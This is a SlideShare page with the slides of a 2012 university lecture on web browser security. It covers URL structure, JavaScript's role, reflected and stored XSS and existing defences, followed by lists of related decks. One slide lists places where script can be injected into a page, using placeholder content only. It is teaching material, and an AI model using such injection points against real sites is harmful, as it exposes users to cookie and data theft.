SlideShare une entreprise Scribd logo

Secure webbrowsing 1

Télécharger en tant que PPTX, PDF
UT, San Antonio
UT, San Antonio
CarrièreTechnologie
1  sur  27
Odyssey to Web Browser Security - 1 Prepared by: Prosunjit Biswas, Advisor : Dr. Ravi Sandhu Presented : ICS @ UTSA (12th April, 2012) Email: prosun.csedu@gmail.com
What is Web Browsers for? • Web Browsers Retrieve, Present and Traverse information on Web typically provided by web servers. • Web Browsers use URI/URLs to locate and retrieve information.
Http Request (URL) format "protocol:" "//" host [ ":" port ] [ abs_path [ "?" query ]] Examples: 1. http://cs.utsa.edu/index.html 2. http://utsa.summon.serialssolutions.com/search/results? spellcheck=true&q=security 3. http://www.php.net/manual/en/reserved.variables.get.php 4. http://www.amazon.com/s/ref=nb_sb_noss/185-1213459- 6355102 ?url=search-alias%3Daps&field-keywords=iphone
Notice… • The ‘query’ part in the URL may contain user provided data that is feed to the application. • And contains Payload for maximum possible attacks.
Web Application Architecture: Server Side & Client Side Courtesy: “Top 10 attacks” by Saumil Shah
How a Request is resolved by the Server for the Browser?
Server Response at Browser Side Server Response Includes: o Data/Information (personal Info) o HTML Markups(table, paragraph) o Javascript / Other Script o Cookies ( session information) o Browser Configuration Meta data o Other Resources(Ex: Flash, CSS )
HTML Markup • HTML Markups provides presentation for the data/content. • In Web 2.0 data & Markup altogether build Document Object Model (DOM) • DOM form a XML tree structure for easy retrieval of data.
Script / Javascript • When We say Dynamic HTML( DHTML), this dynamicity is achieved by JavaScript at the Browser Side. • JavaScript can manipulate (Insert/delete/ Modify) any content in the browser . • Unfortunately it is „The World's Most Misunderstood Programming Language’ -- Douglas Crockford
Where to put JavaScript in a web page ? • Typically JS can be put almost all places. • <script> JS content </script> • <input onclick=“JS content”> • <img src=“javascript:JS Content”> • And others.
How Web Browsing can be insecure? • Attacker Steals data [Attack User information] • Attacker defaces a webpage [Attack markup] • Inject / Modify JavaScript [Script Based attack] • Steal Cookie • Insert Meta Data on page • Attack other Resources [ex: Image]
Notice … • All the mentioned attacks can be achieved by injecting / modifying JavaScript on a honest web page.
Risk That We Do Not Care … • A website is malicious and an user visits this site and get infected. [We can leave it to the discretion of the visitor]
Risk That We Care(2) … • A website is not intended to be malicious but attacker has compromised this page and let everyone who visit it, be compromised. o [ We do Care for this ]
Attacking Approach (Client-server Perspective) • Attack Servers / Services [ Server side attack] o Ex. Website Defacement , o SQL injection, o DoS Attack and others • Attack Web Client [ Client / Browser based attack]. o Ex: XSS ( Cross Site Scripting) o XSRF ( Cross Site Request forgery) o Phishing ( Social Eng.) and others
Attacking Approach (Way of Attacks) • Content Injection o SQL Injection o Script Injection (XSS) o DOM element Injection (DOM based XSS) • Breaking Access-Control / Access- Restriction o Cross Domain / Cross Frame Attack o Ex. Cross Domain Capability Leaks • Exploiting Application Configuration o Session Hijacking / Credential Stealing o Failure to Restrict URL access o Insecure Cryptography
Attacking Approach (Way of Attacks) continuing… • Insecure Network o Proxy-based attack o Man-in-the-middle attacks • Web Based Malware Attack We are more Interested on Content Injection Attack because of its wide attack surface.
Content Injection (Through URL) Demonstrating Reflected XSS attack Sends through email / other way www.goodhost.com?search=@#badcontent#@ @#badcontent #@ Clicks the URL Client Web Browser @#badcontent #@ @#badcontent#@ @#badcontent #@ Web Server User is infected with the injection attack
Content Injection (via comment) Demonstrating ‘Stored XSS attack’ Inserted in DB @#comment!@# Malicious content Comment Retrieved From database @#comment!@# Clicks the URL Clicks the URL Request Put Malicious comment Bob Request the same page
Content Injection Attack (2) (What content?) • SQL ( Data Integrity & Privacy attack) • Script / JavaScript (Privacy attack – Steal Cookie) • DOM Element ( Data Integrity - Phishing ) We are more Interested in Script Injection attack (also called XSS) which is easy and obvious but impact is severe therefore critical to handle.
Why attackers prefer JavaScript injection? • JavaScript can access almost all resources in a web page. • JavaScript is supported by all major browsers • JavaScript has great expressive power.
Consequence of XSS attack • Sensitive Information theft. o Credential Theft ( Ex: cookies) • Intranet Scanning o Scan Open ports . • Attacking other users o Replay attack from compromised browser.
What are the Existing Approaches to Protect XSS attacks? All the existing approaches place some kinds of restrictions over JavaScript uses. • Host based Restriction o allow JavaScript from a White listed hosts. o Restrict JavaScript from Black listed hosts. • Place holder Restriction o Restrict places where JavaScript can be inserted.
What are the Existing Approaches to Protect XSS attacks … • Transfer Restriction o Restrict Sensitive Resources to be send out to other hosts/domains. • Content Rewrite o Re-write JavaScript to delete unsafe code. • Flow Control o Control the flow of sensitive information in JavaScript (Taint Sensitive information)
What are other Control Points ? Control JS & DOM Interactions Output Interface Input Interface JS DOM Control Flow of User provided Sanitize URL to data Cookie discard malicious Web Server content Control JS Communication with External Domain Control Cookie Send out to External Domain Compare input / output interface data for to check user whether malicious content is Other Domains trespassed through the server .
References: • http://stackoverflow.com/questions/1267284/common-website-attack- methods-detection-and-recovery • http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf
o Thanks.

Recommandé

Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Web Security Overview and Demo
Web Security Overview and DemoWeb Security Overview and Demo
Web Security Overview and DemoTony Bibbs
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 

Recommandé

Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Web Security Overview and Demo
Web Security Overview and DemoWeb Security Overview and Demo
Web Security Overview and DemoTony Bibbs
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensJonathan LeBlanc
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)vinayh.vaghamshi _
 
Micro Web Service - Slim and JWT
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWTTuyen Vuong
 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web TokensIvan Rosolen
 
Xss
XssXss
XssRajendra Dangwal
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationStefan Achtsnit
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)iMasters
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilitiesn|u - The Open Security Community
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Authentication Concepts
Authentication ConceptsAuthentication Concepts
Authentication ConceptsCharles Southerland
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?Derek Edwards
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongDerek Perkins
 
Json web token
Json web tokenJson web token
Json web tokenMayank Patel
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 

Contenu connexe

Tendances

Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensJonathan LeBlanc
 
Micro Web Service - Slim and JWT
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWTTuyen Vuong
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationStefan Achtsnit
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)iMasters
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?Derek Edwards
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongDerek Perkins
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 

Tendances (20)

Modern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web Tokens
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Micro Web Service - Slim and JWT
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWT
 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web Tokens
 
Xss
XssXss
Xss
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based Authentication
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Authentication Concepts
Authentication ConceptsAuthentication Concepts
Authentication Concepts
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
 
Json web token
Json web tokenJson web token
Json web token
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 

Similaire à Secure webbrowsing 1

Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격선협 이
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBSides Delhi
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssdcervigni
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application FirewallPort80 Software
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 

Similaire à Secure webbrowsing 1 (20)

Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security Playground
 
Xss 101
Xss 101Xss 101
Xss 101
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application Firewall
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
4.Xss
4.Xss4.Xss
4.Xss
 

Plus de UT, San Antonio

digital certificate - types and formats
digital certificate - types and formatsdigital certificate - types and formats
digital certificate - types and formatsUT, San Antonio
 
Static Analysis with Sonarlint
Static Analysis with SonarlintStatic Analysis with Sonarlint
Static Analysis with SonarlintUT, San Antonio
 
Shellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityShellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityUT, San Antonio
 
Big Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationBig Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationUT, San Antonio
 
Enumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelEnumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelUT, San Antonio
 
Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)UT, San Antonio
 
Security_of_openstack_keystone
Security_of_openstack_keystoneSecurity_of_openstack_keystone
Security_of_openstack_keystoneUT, San Antonio
 
Research seminar group_1_prosunjit
Research seminar group_1_prosunjitResearch seminar group_1_prosunjit
Research seminar group_1_prosunjitUT, San Antonio
 
Attribute Based Encryption
Attribute Based EncryptionAttribute Based Encryption
Attribute Based EncryptionUT, San Antonio
 
Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction UT, San Antonio
 

Plus de UT, San Antonio (20)

digital certificate - types and formats
digital certificate - types and formatsdigital certificate - types and formats
digital certificate - types and formats
 
Saml metadata
Saml metadataSaml metadata
Saml metadata
 
Static Analysis with Sonarlint
Static Analysis with SonarlintStatic Analysis with Sonarlint
Static Analysis with Sonarlint
 
Shellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerabilityShellshock- from bug towards vulnerability
Shellshock- from bug towards vulnerability
 
Abac17 prosun-slides
Abac17 prosun-slidesAbac17 prosun-slides
Abac17 prosun-slides
 
Abac17 prosun-slides
Abac17 prosun-slidesAbac17 prosun-slides
Abac17 prosun-slides
 
Recitation
RecitationRecitation
Recitation
 
Recitation
RecitationRecitation
Recitation
 
Big Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory ComputationBig Data Processing: Performance Gain Through In-Memory Computation
Big Data Processing: Performance Gain Through In-Memory Computation
 
Enumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) modelEnumerated authorization policy ABAC (EP-ABAC) model
Enumerated authorization policy ABAC (EP-ABAC) model
 
Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)Where is my Privacy presentation slideshow (one page only)
Where is my Privacy presentation slideshow (one page only)
 
Three month course
Three month courseThree month course
Three month course
 
One month-syllabus
One month-syllabusOne month-syllabus
One month-syllabus
 
Zerovm backgroud
Zerovm backgroudZerovm backgroud
Zerovm backgroud
 
Security_of_openstack_keystone
Security_of_openstack_keystoneSecurity_of_openstack_keystone
Security_of_openstack_keystone
 
Research seminar group_1_prosunjit
Research seminar group_1_prosunjitResearch seminar group_1_prosunjit
Research seminar group_1_prosunjit
 
Ksi
KsiKsi
Ksi
 
Attribute Based Encryption
Attribute Based EncryptionAttribute Based Encryption
Attribute Based Encryption
 
Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction Final Project Transciption Factor DNA binding Prediction
Final Project Transciption Factor DNA binding Prediction
 
Cyber Security Exam 2
Cyber Security Exam 2Cyber Security Exam 2
Cyber Security Exam 2
 

Dernier

Abanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoubGhobrial1
 
LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024Bruce Bennett
 
Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...Anas Acharath Parakat
 
Chapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.pptChapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.pptmoytopo
 
LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024Bruce Bennett
 
4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUESaishwaryakhare5
 
Human Rights are notes and helping material
Human Rights are notes and helping materialHuman Rights are notes and helping material
Human Rights are notes and helping materialnadeemcollege26
 
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024Hector Del Castillo, CPM, CPMM
 
The Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating PressThe Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating Pressmatingpress170
 
Transportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptxTransportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptxSheldon Byron
 
Design, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptxDesign, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptxaaronbasko1
 
Network to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job SearchNetwork to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job SearchBruce Bennett
 
Soviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the EarthSoviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the EarthChristina Parmionova
 
Banged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls DubaiBanged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls Dubaikojalkojal131
 
How to make career in advance 3d animation
How to make career in advance 3d animationHow to make career in advance 3d animation
How to make career in advance 3d animationsantoshjadhav126
 
美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作ss846v0c
 
Back on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental LeaveBack on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental LeaveMarharyta Nedzelska
 
Career-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptxCareer-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptxGachaFluffy
 
How to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptxHow to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptxJohnreyFalsarioBasid
 
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
